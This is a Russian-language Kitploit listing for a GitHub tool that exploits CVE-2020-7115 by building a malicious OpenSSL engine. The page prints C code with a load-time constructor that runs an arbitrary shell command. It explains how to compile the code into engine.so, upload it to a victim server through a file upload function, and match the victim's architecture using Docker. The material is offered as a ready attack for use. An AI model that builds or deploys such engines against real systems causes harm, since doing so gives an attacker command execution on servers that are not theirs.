Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-7115 — Создайте свой вредоносный движок за секунды | Kitploit
Инструменты/GitHubGitHub/retr02332/cve-2020-7115
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubretr02332/cve-2020-7115

CVE-2020-7115

Создайте свой вредоносный движок за секунды

Репозиторий
115 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-7115

Создайте свой вредоносный движок за секунды

build_engine.sh

Простой скрипт для генерации вредоносного движка, готового к использованию в сценариях внедрения аргументов в openssl.

Как использовать?

Это очень просто, просто измените файл engine.c, указав команду по вашему выбору:

root@kitploit:~
#include <unistd.h>

__attribute__((constructor))
static void init() {
    execl("/bin/sh", "sh", "-c", "COMMAND");
}

После этого вам просто нужно запустить скрипт следующим образом:

root@kitploit:~
bash build_engine.sh

Эта команда создаст папку с именем output, в которой вы найдете файл engine.so, который необходимо отправить на сервер через функцию загрузки файлов.

Как поднять docker для запуска скрипта и зачем это делать?

Важно знать, что вы должны создавать вредоносный движок с теми же характеристиками, что и у системы жертвы. То есть... если целевая система работает на 64-битном Linux, вы должны создавать вредоносный движок на 64-битном Linux.

Docker — это замечательная технология для таких вещей, и настройка среды очень проста.

Сначала загрузите образ docker с этого сайта для 64-битной системы Debian Linux:

root@kitploit:~
sudo docker pull debian

Затем мы поднимем docker следующим образом:

root@kitploit:~
sudo docker run -v `pwd`:/code -it debian

Давайте немного разберемся, что мы здесь сделали. Флаг -v используется для создания тома, в данном случае мы связываем содержимое папки /code с содержимым нашей текущей директории, отсюда и использование pwd.

Под связыванием я подразумеваю, что всё, что мы создаем или редактируем в /code (папка, расположенная в корне образа docker), будет отображаться в pwd и наоборот.

В нашем случае pwd указывает на следующую директорию на нашей локальной машине:

/home/retr0/CVE-2020-7115/

Флаг -it, с другой стороны, можно описать следующим образом:

Флаг -t (--tty) указывает Docker создать виртуальную терминальную сессию внутри контейнера. Обычно он используется с опцией -i (--interactive), которая оставляет STDIN открытым, даже если контейнер работает в detached mode.

Таким образом, использование флага -it полезно, когда мы хотим получить оболочку (shell) из данного контейнера.

Не знаете CVE-2020-7115?

Без проблем, просто посетите этот пост, и я уверен, вы полностью поймете эту уязвимость.

Скачать инструмент